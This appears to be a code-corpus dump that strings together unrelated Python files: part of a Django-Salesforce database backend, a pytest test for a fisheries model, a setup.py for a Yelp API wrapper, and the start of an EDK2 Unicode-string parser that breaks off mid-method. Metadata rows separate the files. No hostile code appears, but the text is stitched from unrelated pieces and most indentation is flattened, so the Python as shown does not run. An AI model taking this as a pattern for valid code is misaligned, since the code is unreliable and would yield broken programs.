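# ('42', "'O\\'Hara'", 'NULL'), i.e. the single quote is escaped inside the
# SOQL string literal and None becomes NULL.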
def process_json_args(args):
"""
Perform necessary JSON quoting on the arg list.
"""
def _escape(item, conv):
if(isinstance(item, models.SalesforceModel)):
return conv.get(models.SalesforceModel, conv[str])(item, conv)
if(isinstance(item, decimal.Decimal)):
return conv.get(decimal.Decimal, conv[str])(item, conv)
return conv.get(type(item), conv[str])(item, conv)
return tuple([_escape(x, json_conversions) for x in args])
def handle_api_exceptions(url, f, *args, **kwargs):
"""Call REST API and handle exceptions
Params:
f: requests.get or requests.post...
_cursor: sharing the debug information in cursor
"""
global request_count
from salesforce.backend import base
# The 'verify' option is about verifying SSL certificates
kwargs_in = {'timeout': getattr(settings, 'SALESFORCE_QUERY_TIMEOUT', 3),
'verify': True}
kwargs_in.update(kwargs)
_cursor = kwargs_in.pop('_cursor', None)
log.debug('Request API URL: %s' % url)
request_count += 1
try:
response = f(url, *args, **kwargs_in)
# TODO some timeouts can be rarely raised as "SSLError: The read operation timed out"
except requests.exceptions.Timeout:
raise base.SalesforceError("Timeout, URL=%s" % url)
if response.status_code == 401:
# Unauthorized (expired or invalid session ID or OAuth)
data = response.json()[0]
if(data['errorCode'] == 'INVALID_SESSION_ID'):
            token = f.__self__.auth.reauthenticate()
if('headers' in kwargs):
kwargs['headers'].update(dict(Authorization='OAuth %s' % token))
try:
response = f(url, *args, **kwargs_in)
except requests.exceptions.Timeout:
raise base.SalesforceError("Timeout, URL=%s" % url)
if response.status_code in (200, 201, 204):
return response
# TODO Remove this verbose setting after tuning of specific messages.
# Currently it is better more or less.
# http://www.salesforce.com/us/developer/docs/api_rest/Content/errorcodes.htm
verbose = not getattr(getattr(_cursor, 'query', None), 'debug_silent', False)
# Errors are reported in the body
data = response.json()[0]
if response.status_code == 404: # ResourceNotFound
if (f.__func__.__name__ == 'delete') and data['errorCode'] in (
'ENTITY_IS_DELETED', 'INVALID_CROSS_REFERENCE_KEY'):
# It is a delete command and the object is in trash bin or
# completely deleted or it only could be a valid Id for this type
# then is ignored similarly to delete by a classic database query:
# DELETE FROM xy WHERE id = 'something_deleted_yet'
return None
else:
# if this Id can not be ever valid.
raise base.SalesforceError("Couldn't connect to API (404): %s, URL=%s"
% (response.text, url), data, response, verbose)
if(data['errorCode'] == 'INVALID_FIELD'):
raise base.SalesforceError(data['message'], data, response, verbose)
elif(data['errorCode'] == 'MALFORMED_QUERY'):
raise base.SalesforceError(data['message'], data, response, verbose)
elif(data['errorCode'] == 'INVALID_FIELD_FOR_INSERT_UPDATE'):
raise base.SalesforceError(data['message'], data, response, verbose)
elif(data['errorCode'] == 'METHOD_NOT_ALLOWED'):
raise base.SalesforceError('%s: %s' % (url, data['message']), data, response, verbose)
# some kind of failed query
else:
raise base.SalesforceError('%s' % data, data, response, verbose)
def prep_for_deserialize(model, record, using, init_list=None):
"""
Convert a record from SFDC (decoded JSON) to dict(model string, pk, fields)
    It fixes fields of some types. If names of required fields `init_list` are
specified, then only these fields are processed.
"""
from salesforce.backend import base
# TODO the parameter 'using' is not currently important.
attribs = record.pop('attributes')
mod = model.__module__.split('.')
if(mod[-1] == 'models'):
app_label = mod[-2]
elif(hasattr(model._meta, 'app_label')):
app_label = getattr(model._meta, 'app_label')
else:
        raise ImproperlyConfigured(
            "Can't discover the app_label for %s; you must specify it via model meta options." % model.__module__)
if len(record.keys()) == 1 and model._meta.db_table in record:
while len(record) == 1:
record = list(record.values())[0]
fields = dict()
for x in model._meta.fields:
if not x.primary_key and (not init_list or x.name in init_list):
if x.column.endswith('.Type'):
# Type of generic foreign key
simple_column, _ = x.column.split('.')
fields[x.name] = record[simple_column]['Type']
else:
# Normal fields
field_val = record[x.column]
#db_type = x.db_type(connection=connections[using])
if(x.__class__.__name__ == 'DateTimeField' and field_val is not None):
d = datetime.datetime.strptime(field_val, SALESFORCE_DATETIME_FORMAT)
import pytz
d = d.replace(tzinfo=pytz.utc)
if settings.USE_TZ:
fields[x.name] = d.strftime(DJANGO_DATETIME_FORMAT)
else:
tz = pytz.timezone(settings.TIME_ZONE)
d = tz.normalize(d.astimezone(tz))
fields[x.name] = d.strftime(DJANGO_DATETIME_FORMAT[:-6])
else:
fields[x.name] = field_val
if init_list and set(init_list).difference(fields).difference([SF_PK]):
raise base.DatabaseError("Not found some expected fields")
return dict(
model = '.'.join([app_label, model.__name__]),
pk = record.pop('Id'),
fields = fields,
)
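# Illustrative shape of the dict returned above (the app label, record Id and
# field values here are hypothetical):
#     {'model': 'example_app.Contact',
#      'pk': '003000000000001AAA',
#      'fields': {'last_name': 'Smith', 'email': 'smith@example.com'}}
# This is the structure consumed by django.core.serializers.python.Deserializer
# in SalesforceQuerySet.iterator().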
def extract_values(query):
"""
Extract values from insert or update query.
"""
d = dict()
fields = query.model._meta.fields
for index in range(len(fields)):
field = fields[index]
if (field.get_internal_type() == 'AutoField' or
isinstance(query, subqueries.UpdateQuery) and (getattr(field, 'sf_read_only', 0) & NOT_UPDATEABLE) != 0 or
isinstance(query, subqueries.InsertQuery) and (getattr(field, 'sf_read_only', 0) & NOT_CREATEABLE) != 0):
continue
if(isinstance(query, subqueries.UpdateQuery)):
value_or_empty = [value for qfield, model, value in query.values if qfield.name == field.name]
if value_or_empty:
[value] = value_or_empty
else:
assert len(query.values) < len(fields), \
"Match name can miss only with an 'update_fields' argument."
continue
else: # insert
# TODO bulk insert
assert len(query.objs) == 1, "bulk_create is not supported by Salesforce REST API"
value = getattr(query.objs[0], field.attname)
# The 'DEFAULT' is a backward compatibility name.
if isinstance(field, (models.ForeignKey, models.BooleanField)) and value in ('DEFAULT', 'DEFAULTED_ON_CREATE'):
continue
if isinstance(value, models.DefaultedOnCreate):
continue
[arg] = process_json_args([value])
d[field.column] = arg
return d
class SalesforceRawQuerySet(query.RawQuerySet):
def __len__(self):
if self.query.cursor is None:
# force the query
self.query.get_columns()
return self.query.cursor.rowcount
class SalesforceQuerySet(query.QuerySet):
"""
Use a custom SQL compiler to generate SOQL-compliant queries.
"""
def iterator(self):
"""
An iterator over the results from applying this QuerySet to the
remote web service.
"""
try:
sql, params = SQLCompiler(self.query, connections[self.db], None).as_sql()
except EmptyResultSet:
raise StopIteration
cursor = CursorWrapper(connections[self.db], self.query)
cursor.execute(sql, params)
pfd = prep_for_deserialize
only_load = self.query.get_loaded_field_names()
load_fields = []
# If only/defer clauses have been specified,
# build the list of fields that are to be loaded.
if not only_load:
model_cls = self.model
init_list = None
else:
if DJANGO_16_PLUS:
fields = self.model._meta.concrete_fields
fields_with_model = self.model._meta.get_concrete_fields_with_model()
else:
fields = self.model._meta.fields
fields_with_model = self.model._meta.get_fields_with_model()
for field, model in fields_with_model:
if model is None:
model = self.model
try:
selected_name = field.attname if DJANGO_18_PLUS else field.name
if selected_name in only_load[model]:
# Add a field that has been explicitly included
load_fields.append(field.name)
except KeyError:
# Model wasn't explicitly listed in the only_load table
# Therefore, we need to load all fields from this model
load_fields.append(field.name)
init_list = []
skip = set()
for field in fields:
if field.name not in load_fields:
skip.add(field.attname)
else:
init_list.append(field.name)
model_cls = deferred_class_factory(self.model, skip)
field_names = self.query.get_loaded_field_names()
for res in python.Deserializer(pfd(model_cls, r, self.db, init_list) for r in cursor.results):
# Store the source database of the object
res.object._state.db = self.db
# This object came from the database; it's not being added.
res.object._state.adding = False
yield res.object
def query_all(self):
"""
        Allows querying also for deleted or merged records.
Lead.objects.query_all().filter(IsDeleted=True,...)
https://www.salesforce.com/us/developer/docs/api_rest/Content/resources_queryall.htm
"""
obj = self._clone(klass=SalesforceQuerySet)
obj.query.set_query_all()
return obj
class SalesforceRawQuery(RawQuery):
def clone(self, using):
return SalesforceRawQuery(self.sql, using, params=self.params)
def get_columns(self):
if self.cursor is None:
self._execute_query()
converter = connections[self.using].introspection.table_name_converter
if self.cursor.rowcount > 0:
return [converter(col) for col in self.cursor.first_row.keys() if col != 'attributes']
# TODO hy: A more general fix is desirable with rewriting more code.
# This is changed due to Django 1.8.4+ https://github.com/django/django/pull/5036
# related to https://code.djangoproject.com/ticket/12768
return ['Id'] if DJANGO_184_PLUS else [SF_PK]
def _execute_query(self):
self.cursor = CursorWrapper(connections[self.using], self)
self.cursor.execute(self.sql, self.params)
def __repr__(self):
return "<SalesforceRawQuery: %s; %r>" % (self.sql, tuple(self.params))
class SalesforceQuery(Query):
"""
Override aggregates.
"""
# Warn against name collision: The name 'aggregates' is the name of
# a new property introduced by Django 1.7 to the parent class
# 'django.db.models.sql.query.Query'.
    # 'aggregates_module' is overridden here, to be visible in the base class.
from salesforce.backend import aggregates as aggregates_module
def __init__(self, *args, **kwargs):
super(SalesforceQuery, self).__init__(*args, **kwargs)
self.is_query_all = False
self.first_chunk_len = None
self.max_depth = 1
def clone(self, klass=None, memo=None, **kwargs):
query = Query.clone(self, klass, memo, **kwargs)
query.is_query_all = self.is_query_all
return query
def has_results(self, using):
q = self.clone()
compiler = q.get_compiler(using=using)
return bool(compiler.execute_sql(constants.SINGLE))
def set_query_all(self):
self.is_query_all = True
if DJANGO_18_PLUS:
def get_count(self, using):
"""
Performs a COUNT() query using the current filter constraints.
"""
obj = self.clone()
obj.add_annotation(Count('pk'), alias='x_sf_count', is_summary=True)
number = obj.get_aggregation(using, ['x_sf_count'])['x_sf_count']
if number is None:
number = 0
return number
class CursorWrapper(object):
"""
A wrapper that emulates the behavior of a database cursor.
This is the class that is actually responsible for making connections
to the SF REST API
"""
def __init__(self, db, query=None):
"""
Connect to the Salesforce API.
"""
self.db = db
self.query = query
self.session = db.sf_session
        # After execute(), an empty result set is consistently represented as `iter([])`
self.results = None
self.rowcount = None
self.first_row = None
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
@property
def oauth(self):
return self.session.auth.authenticate()
def execute(self, q, args=()):
"""
Send a query to the Salesforce API.
"""
from salesforce.backend import base
self.rowcount = None
if isinstance(self.query, SalesforceQuery) or self.query is None:
response = self.execute_select(q, args)
elif isinstance(self.query, SalesforceRawQuery):
response = self.execute_select(q, args)
elif isinstance(self.query, subqueries.InsertQuery):
response = self.execute_insert(self.query)
elif isinstance(self.query, subqueries.UpdateQuery):
response = self.execute_update(self.query)
elif isinstance(self.query, subqueries.DeleteQuery):
response = self.execute_delete(self.query)
else:
raise base.DatabaseError("Unsupported query: type %s: %s" % (type(self.query), self.query))
# the encoding is detected automatically, e.g. from headers
if(response and response.text):
            # parse_float is set to decimal.Decimal to avoid precision errors when
            # converting a JSON number to a float and then to a Decimal object on
            # a model's DecimalField; the JSON number is converted directly to a
            # Decimal object instead.
data = response.json(parse_float=decimal.Decimal)
# a SELECT query
if('totalSize' in data):
self.rowcount = data['totalSize']
# a successful INSERT query, return after getting PK
elif('success' in data and 'id' in data):
self.lastrowid = data['id']
return
# something we don't recognize
else:
raise base.DatabaseError(data)
if q.upper().startswith('SELECT COUNT() FROM'):
# COUNT() queries in SOQL are a special case, as they don't actually return rows
self.results = iter([[self.rowcount]])
else:
if self.query:
self.query.first_chunk_len = len(data['records'])
self.first_row = data['records'][0] if data['records'] else None
self.results = self.query_results(data)
else:
self.results = iter([])
def execute_select(self, q, args):
processed_sql = str(q) % process_args(args)
cmd = 'query' if not getattr(self.query, 'is_query_all', False) else 'queryAll'
url = u'{base}{api}/{cmd}?{query_str}'.format(
base=self.session.auth.instance_url, api=API_STUB, cmd=cmd,
query_str=urlencode(dict(q=processed_sql)),
)
log.debug(processed_sql)
return handle_api_exceptions(url, self.session.get, _cursor=self)
def query_more(self, nextRecordsUrl):
url = u'%s%s' % (self.session.auth.instance_url, nextRecordsUrl)
return handle_api_exceptions(url, self.session.get, _cursor=self)
def execute_insert(self, query):
table = query.model._meta.db_table
url = self.session.auth.instance_url + API_STUB + ('/sobjects/%s/' % table)
headers = {'Content-Type': 'application/json'}
post_data = extract_values(query)
log.debug('INSERT %s%s' % (table, post_data))
return handle_api_exceptions(url, self.session.post, headers=headers, data=json.dumps(post_data), _cursor=self)
def execute_update(self, query):
table = query.model._meta.db_table
# this will break in multi-row updates
if DJANGO_17_PLUS:
pk = query.where.children[0].rhs
elif DJANGO_16_PLUS:
pk = query.where.children[0][3]
else:
pk = query.where.children[0].children[0][-1]
assert pk
url = self.session.auth.instance_url + API_STUB + ('/sobjects/%s/%s' % (table, pk))
headers = {'Content-Type': 'application/json'}
post_data = extract_values(query)
log.debug('UPDATE %s(%s)%s' % (table, pk, post_data))
ret = handle_api_exceptions(url, self.session.patch, headers=headers, data=json.dumps(post_data), _cursor=self)
self.rowcount = 1
return ret
def execute_delete(self, query):
table = query.model._meta.db_table
        ## the root WHERE node's children may themselves have children.
def recurse_for_pk(children):
for node in children:
if hasattr(node, 'rhs'):
pk = node.rhs[0] # for Django 1.7+
else:
try:
pk = node[-1][0]
except TypeError:
pk = recurse_for_pk(node.children)
return pk
pk = recurse_for_pk(self.query.where.children)
assert pk
url = self.session.auth.instance_url + API_STUB + ('/sobjects/%s/%s' % (table, pk))
log.debug('DELETE %s(%s)' % (table, pk))
return handle_api_exceptions(url, self.session.delete, _cursor=self)
def query_results(self, results):
while True:
for rec in results['records']:
if rec['attributes']['type'] == 'AggregateResult' and hasattr(self.query, 'aggregate_select'):
assert len(rec) -1 == len(list(self.query.aggregate_select.items()))
# The 'attributes' info is unexpected for Django within fields.
rec = [rec[k] for k, _ in self.query.aggregate_select.items()]
yield rec
if results['done']:
break
# see about Retrieving the Remaining SOQL Query Results
# http://www.salesforce.com/us/developer/docs/api_rest/Content/dome_query.htm#retrieve_remaining_results_title
response = self.query_more(results['nextRecordsUrl'])
results = response.json(parse_float=decimal.Decimal)
def __iter__(self):
return iter(self.results)
def fetchone(self):
"""
Fetch a single result from a previously executed query.
"""
try:
return next(self.results)
except StopIteration:
return None
def fetchmany(self, size=None):
"""
Fetch multiple results from a previously executed query.
"""
if size is None:
size = 200
return list(islice(self.results, size))
def fetchall(self):
"""
Fetch all results from a previously executed query.
"""
return list(self.results)
def close(self): # for Django 1.7+
pass
string_literal = quoted_string_literal
def date_literal(d, c):
if not d.tzinfo:
import time
tz = pytz.timezone(settings.TIME_ZONE)
d = tz.localize(d, is_dst=time.daylight)
# Format of `%z` is "+HHMM"
tzname = datetime.datetime.strftime(d, "%z")
return datetime.datetime.strftime(d, "%Y-%m-%dT%H:%M:%S.000") + tzname
def sobj_id(obj, conv):
return obj.pk
# supported types
sql_conversions = {
int: lambda s,d: str(s),
float: lambda o,d: '%.15g' % o,
type(None): lambda s,d: 'NULL',
str: lambda o,d: string_literal(o, d), # default
bool: lambda s,d: str(s).lower(),
datetime.date: lambda d,c: datetime.date.strftime(d, "%Y-%m-%d"),
datetime.datetime: lambda d,c: date_literal(d, c),
decimal.Decimal: lambda s,d: float(s),
models.SalesforceModel: sobj_id,
}
if not PY3:
sql_conversions[long] = lambda s,d: str(s)
sql_conversions[unicode] = lambda s,d: string_literal(s.encode('utf8'), d)
# supported types
json_conversions = {
int: lambda s,d: str(s),
float: lambda o,d: '%.15g' % o,
type(None): lambda s,d: None,
str: lambda o,d: o, # default
bool: lambda s,d: str(s).lower(),
datetime.date: lambda d,c: datetime.date.strftime(d, "%Y-%m-%d"),
datetime.datetime: date_literal,
datetime.time: lambda d,c: datetime.time.strftime(d, "%H:%M:%S.%f"),
decimal.Decimal: lambda s,d: float(s),
models.SalesforceModel: sobj_id,
}
if not PY3:
json_conversions[long] = lambda s,d: str(s)
json_conversions[unicode] = lambda s,d: s.encode('utf8')
| mit | 5,083,674,688,785,843,000 | 33.691558 | 115 | 0.697847 | false | 3.144034 | false | false | false |
socsol/infsocsol | tests/test_fisheries_det_basic.py | 1 | 2311 | # Copyright 2019 Alastair Pharo
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import numpy
import os
import scipy
from numpy.testing import assert_allclose
from infsocsol.helpers import matrix
@pytest.fixture(scope="module", params=[
# engine states time_step start steps steady steady_accuracy optim_accuracy
( 'matlab', 10, 1, (100.0, 0.5), 100, True, 0.01, 0.009 ),
( 'matlab', 20, 0.5, (600.0, 0.6), 200, True, 0.01, 0.015 ),
( 'matlab', 40, 0.25, (60.0, 0.1), 300, True, 0.01, 0.018 ),
( 'matlab', 10, 1, (600.0, 1.0), 200, False, 0.001, None ),
( 'octave', 10, 1, (100.0, 0.5), 100, True, 0.001, 0.009 ),
( 'octave', 20, 0.5, (600.0, 0.6), 200, True, 0.001, 0.015 )
])
def fisheries_scenario(request):
return request.param
def test_fisheries_det_basic(engines, fisheries_scenario):
_engine, states, time_step, _start, steps, steady, steady_accuracy, optim_accuracy = fisheries_scenario
engine = engines[_engine]
start = matrix(engine, _start)
engine.cd(os.path.join(os.path.dirname(__file__), "fisheries_det_basic"))
engine.solve(float(states), float(time_step), nargout=0)
final = numpy.array(engine.sim_final(start, steps))
    # This is determined by setting s_dot = 0, which solves to 1 = x/L + (q/r) e
steady_one = numpy.dot(final, [1/600, 5/4])
if steady:
assert_allclose(steady_one, 1, atol=steady_accuracy)
# This is the most profitable steady state -- x = L/2 + c/2pq
profit_max_steady = numpy.array([[302.5, 0.39667]])
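        # Cross-check (illustrative): the optimum above also satisfies the
        # steady-state relation, since 302.5/600 + 1.25*0.39667 ~= 1.0.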
assert_allclose(final, profit_max_steady, rtol=optim_accuracy)
else:
assert steady_one > 1 + steady_accuracy
| apache-2.0 | -2,571,641,643,230,344,000 | 43.442308 | 107 | 0.632627 | false | 3.118758 | false | false | false |
motte/python-yelp | setup.py | 1 | 1207 | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
from os.path import join
from setuptools import setup, find_packages
import pyyelp
# To get python setup.py test to work on python 2.7
try:
import multiprocessing
import logging
except ImportError:
pass
setup(
name=pyyelp.__name__,
version=pyyelp.__version__,
author=pyyelp.__author__,
author_email=pyyelp.__email__,
url='https://github.com/motte/python-yelp',
download_url = 'https://github.com/motte/python-yelp/tarball/{0}'.format(pyyelp.__version__),
description='Python wrapper for the Yelp v2 api',
long_description=open('README.md').read(),
license='ISC',
packages = [pyyelp.__name__],
keywords = ['yelp', 'wrapper', 'api'],
install_requires=map(str.strip,open(join('requirements', 'base.txt'))),
include_package_data=True,
classifiers=(
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'License :: OSI Approved :: ISC License (ISCL)',
'Operating System :: OS Independent',
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
),
)
| isc | -8,819,387,810,392,762,000 | 29.948718 | 97 | 0.63546 | false | 3.702454 | false | false | false |
google/google-ctf | third_party/edk2/BaseTools/Source/Python/UPT/Library/UniClassObject.py | 1 | 50306 | ## @file
# Collect all defined strings in multiple uni files.
#
# Copyright (c) 2014 - 2019, Intel Corporation. All rights reserved.<BR>
#
# This program and the accompanying materials are licensed and made available
# under the terms and conditions of the BSD License which accompanies this
# distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
"""
Collect all defined strings in multiple uni files
"""
from __future__ import print_function
##
# Import Modules
#
import os, codecs, re
import distutils.util
from Logger import ToolError
from Logger import Log as EdkLogger
from Logger import StringTable as ST
from Library.StringUtils import GetLineNo
from Library.Misc import PathClass
from Library.Misc import GetCharIndexOutStr
from Library import DataType as DT
from Library.ParserValidate import CheckUTF16FileHeader
##
# Static definitions
#
UNICODE_WIDE_CHAR = u'\\wide'
UNICODE_NARROW_CHAR = u'\\narrow'
UNICODE_NON_BREAKING_CHAR = u'\\nbr'
UNICODE_UNICODE_CR = '\r'
UNICODE_UNICODE_LF = '\n'
NARROW_CHAR = u'\uFFF0'
WIDE_CHAR = u'\uFFF1'
NON_BREAKING_CHAR = u'\uFFF2'
CR = u'\u000D'
LF = u'\u000A'
NULL = u'\u0000'
TAB = u'\t'
BACK_SPLASH = u'\\'
gLANG_CONV_TABLE = {'eng':'en', 'fra':'fr', \
'aar':'aa', 'abk':'ab', 'ave':'ae', 'afr':'af', 'aka':'ak', 'amh':'am', \
'arg':'an', 'ara':'ar', 'asm':'as', 'ava':'av', 'aym':'ay', 'aze':'az', \
'bak':'ba', 'bel':'be', 'bul':'bg', 'bih':'bh', 'bis':'bi', 'bam':'bm', \
'ben':'bn', 'bod':'bo', 'bre':'br', 'bos':'bs', 'cat':'ca', 'che':'ce', \
'cha':'ch', 'cos':'co', 'cre':'cr', 'ces':'cs', 'chu':'cu', 'chv':'cv', \
'cym':'cy', 'dan':'da', 'deu':'de', 'div':'dv', 'dzo':'dz', 'ewe':'ee', \
'ell':'el', 'epo':'eo', 'spa':'es', 'est':'et', 'eus':'eu', 'fas':'fa', \
'ful':'ff', 'fin':'fi', 'fij':'fj', 'fao':'fo', 'fry':'fy', 'gle':'ga', \
'gla':'gd', 'glg':'gl', 'grn':'gn', 'guj':'gu', 'glv':'gv', 'hau':'ha', \
'heb':'he', 'hin':'hi', 'hmo':'ho', 'hrv':'hr', 'hat':'ht', 'hun':'hu', \
'hye':'hy', 'her':'hz', 'ina':'ia', 'ind':'id', 'ile':'ie', 'ibo':'ig', \
'iii':'ii', 'ipk':'ik', 'ido':'io', 'isl':'is', 'ita':'it', 'iku':'iu', \
'jpn':'ja', 'jav':'jv', 'kat':'ka', 'kon':'kg', 'kik':'ki', 'kua':'kj', \
'kaz':'kk', 'kal':'kl', 'khm':'km', 'kan':'kn', 'kor':'ko', 'kau':'kr', \
'kas':'ks', 'kur':'ku', 'kom':'kv', 'cor':'kw', 'kir':'ky', 'lat':'la', \
'ltz':'lb', 'lug':'lg', 'lim':'li', 'lin':'ln', 'lao':'lo', 'lit':'lt', \
'lub':'lu', 'lav':'lv', 'mlg':'mg', 'mah':'mh', 'mri':'mi', 'mkd':'mk', \
'mal':'ml', 'mon':'mn', 'mar':'mr', 'msa':'ms', 'mlt':'mt', 'mya':'my', \
'nau':'na', 'nob':'nb', 'nde':'nd', 'nep':'ne', 'ndo':'ng', 'nld':'nl', \
'nno':'nn', 'nor':'no', 'nbl':'nr', 'nav':'nv', 'nya':'ny', 'oci':'oc', \
'oji':'oj', 'orm':'om', 'ori':'or', 'oss':'os', 'pan':'pa', 'pli':'pi', \
'pol':'pl', 'pus':'ps', 'por':'pt', 'que':'qu', 'roh':'rm', 'run':'rn', \
'ron':'ro', 'rus':'ru', 'kin':'rw', 'san':'sa', 'srd':'sc', 'snd':'sd', \
'sme':'se', 'sag':'sg', 'sin':'si', 'slk':'sk', 'slv':'sl', 'smo':'sm', \
'sna':'sn', 'som':'so', 'sqi':'sq', 'srp':'sr', 'ssw':'ss', 'sot':'st', \
'sun':'su', 'swe':'sv', 'swa':'sw', 'tam':'ta', 'tel':'te', 'tgk':'tg', \
'tha':'th', 'tir':'ti', 'tuk':'tk', 'tgl':'tl', 'tsn':'tn', 'ton':'to', \
'tur':'tr', 'tso':'ts', 'tat':'tt', 'twi':'tw', 'tah':'ty', 'uig':'ug', \
'ukr':'uk', 'urd':'ur', 'uzb':'uz', 'ven':'ve', 'vie':'vi', 'vol':'vo', \
'wln':'wa', 'wol':'wo', 'xho':'xh', 'yid':'yi', 'yor':'yo', 'zha':'za', \
'zho':'zh', 'zul':'zu'}
## Convert a python unicode string to a normal string
#
# Convert a python unicode string to a normal string
# UniToStr(u'I am a string') is 'I am a string'
#
# @param Uni: The python unicode string
#
# @retval: The formatted normal string
#
def UniToStr(Uni):
return repr(Uni)[2:-1]
## Convert a unicode string to a Hex list
#
# Convert a unicode string to a Hex list
# UniToHexList('ABC') is ['0x41', '0x00', '0x42', '0x00', '0x43', '0x00']
#
# @param Uni: The python unicode string
#
# @retval List: The formatted hex list
#
def UniToHexList(Uni):
List = []
for Item in Uni:
Temp = '%04X' % ord(Item)
List.append('0x' + Temp[2:4])
List.append('0x' + Temp[0:2])
return List
## Convert special unicode characters
#
# Convert special characters to (c), (r) and (tm).
#
# @param Uni: The python unicode string
#
# @retval NewUni: The converted unicode string
#
def ConvertSpecialUnicodes(Uni):
OldUni = NewUni = Uni
NewUni = NewUni.replace(u'\u00A9', '(c)')
NewUni = NewUni.replace(u'\u00AE', '(r)')
NewUni = NewUni.replace(u'\u2122', '(tm)')
if OldUni == NewUni:
NewUni = OldUni
return NewUni
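# Illustrative example:
#     ConvertSpecialUnicodes(u'Copyright \u00A9 2014') returns u'Copyright (c) 2014'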
## GetLanguageCode1766
#
# Check the language code read from .UNI file and convert RFC 4646 codes to RFC 1766 codes
# RFC 1766 language codes supported in compatibility mode
# RFC 4646 language codes supported in native mode
#
# @param LangName: Language codes read from .UNI file
#
# @retval LangName: Valid language code in RFC 1766 format or None
#
def GetLanguageCode1766(LangName, File=None):
return LangName
length = len(LangName)
if length == 2:
if LangName.isalpha():
for Key in gLANG_CONV_TABLE.keys():
if gLANG_CONV_TABLE.get(Key) == LangName.lower():
return Key
elif length == 3:
if LangName.isalpha() and gLANG_CONV_TABLE.get(LangName.lower()):
return LangName
else:
EdkLogger.Error("Unicode File Parser",
ToolError.FORMAT_INVALID,
"Invalid RFC 1766 language code : %s" % LangName,
File)
elif length == 5:
if LangName[0:2].isalpha() and LangName[2] == '-':
for Key in gLANG_CONV_TABLE.keys():
if gLANG_CONV_TABLE.get(Key) == LangName[0:2].lower():
return Key
elif length >= 6:
if LangName[0:2].isalpha() and LangName[2] == '-':
for Key in gLANG_CONV_TABLE.keys():
if gLANG_CONV_TABLE.get(Key) == LangName[0:2].lower():
return Key
if LangName[0:3].isalpha() and gLANG_CONV_TABLE.get(LangName.lower()) is None and LangName[3] == '-':
for Key in gLANG_CONV_TABLE.keys():
if Key == LangName[0:3].lower():
return Key
EdkLogger.Error("Unicode File Parser",
ToolError.FORMAT_INVALID,
"Invalid RFC 4646 language code : %s" % LangName,
File)
## GetLanguageCode
#
# Check the language code read from .UNI file and convert RFC 1766 codes to RFC 4646 codes if appropriate
# RFC 1766 language codes supported in compatibility mode
# RFC 4646 language codes supported in native mode
#
# @param LangName: Language codes read from .UNI file
#
# @retval LangName: Valid language code in RFC 4646 format or None
#
def GetLanguageCode(LangName, IsCompatibleMode, File):
length = len(LangName)
if IsCompatibleMode:
if length == 3 and LangName.isalpha():
TempLangName = gLANG_CONV_TABLE.get(LangName.lower())
if TempLangName is not None:
return TempLangName
return LangName
else:
EdkLogger.Error("Unicode File Parser",
ToolError.FORMAT_INVALID,
"Invalid RFC 1766 language code : %s" % LangName,
File)
if (LangName[0] == 'X' or LangName[0] == 'x') and LangName[1] == '-':
return LangName
if length == 2:
if LangName.isalpha():
return LangName
elif length == 3:
if LangName.isalpha() and gLANG_CONV_TABLE.get(LangName.lower()) is None:
return LangName
elif length == 5:
if LangName[0:2].isalpha() and LangName[2] == '-':
return LangName
elif length >= 6:
if LangName[0:2].isalpha() and LangName[2] == '-':
return LangName
if LangName[0:3].isalpha() and gLANG_CONV_TABLE.get(LangName.lower()) is None and LangName[3] == '-':
return LangName
EdkLogger.Error("Unicode File Parser",
ToolError.FORMAT_INVALID,
"Invalid RFC 4646 language code : %s" % LangName,
File)
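# Illustrative examples, based on the conversion table above:
#     GetLanguageCode('eng', True, File)    returns 'en'    (RFC 1766 code mapped in compatible mode)
#     GetLanguageCode('en-US', False, File) returns 'en-US' (already a valid RFC 4646 code)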
## FormatUniEntry
#
# Formatted the entry in Uni file.
#
# @param StrTokenName StrTokenName.
# @param TokenValueList A list that needs to be processed.
# @param ContainerFile ContainerFile.
#
# @return formatted entry
def FormatUniEntry(StrTokenName, TokenValueList, ContainerFile):
SubContent = ''
PreFormatLength = 40
if len(StrTokenName) > PreFormatLength:
PreFormatLength = len(StrTokenName) + 1
for (Lang, Value) in TokenValueList:
if not Value or Lang == DT.TAB_LANGUAGE_EN_X:
continue
if Lang == '':
Lang = DT.TAB_LANGUAGE_EN_US
if Lang == 'eng':
Lang = DT.TAB_LANGUAGE_EN_US
elif len(Lang.split('-')[0]) == 3:
Lang = GetLanguageCode(Lang.split('-')[0], True, ContainerFile)
else:
Lang = GetLanguageCode(Lang, False, ContainerFile)
ValueList = Value.split('\n')
SubValueContent = ''
for SubValue in ValueList:
if SubValue.strip():
SubValueContent += \
' ' * (PreFormatLength + len('#language en-US ')) + '\"%s\\n\"' % SubValue.strip() + '\r\n'
SubValueContent = SubValueContent[(PreFormatLength + len('#language en-US ')):SubValueContent.rfind('\\n')] \
+ '\"' + '\r\n'
SubContent += ' '*PreFormatLength + '#language %-5s ' % Lang + SubValueContent
if SubContent:
SubContent = StrTokenName + ' '*(PreFormatLength - len(StrTokenName)) + SubContent[PreFormatLength:]
return SubContent
## StringDefClassObject
#
# A structure for language definition
#
class StringDefClassObject(object):
def __init__(self, Name = None, Value = None, Referenced = False, Token = None, UseOtherLangDef = ''):
self.StringName = ''
self.StringNameByteList = []
self.StringValue = ''
self.StringValueByteList = ''
self.Token = 0
self.Referenced = Referenced
self.UseOtherLangDef = UseOtherLangDef
self.Length = 0
if Name is not None:
self.StringName = Name
self.StringNameByteList = UniToHexList(Name)
if Value is not None:
self.StringValue = Value
self.StringValueByteList = UniToHexList(self.StringValue)
self.Length = len(self.StringValueByteList)
if Token is not None:
self.Token = Token
def __str__(self):
return repr(self.StringName) + ' ' + \
repr(self.Token) + ' ' + \
repr(self.Referenced) + ' ' + \
repr(self.StringValue) + ' ' + \
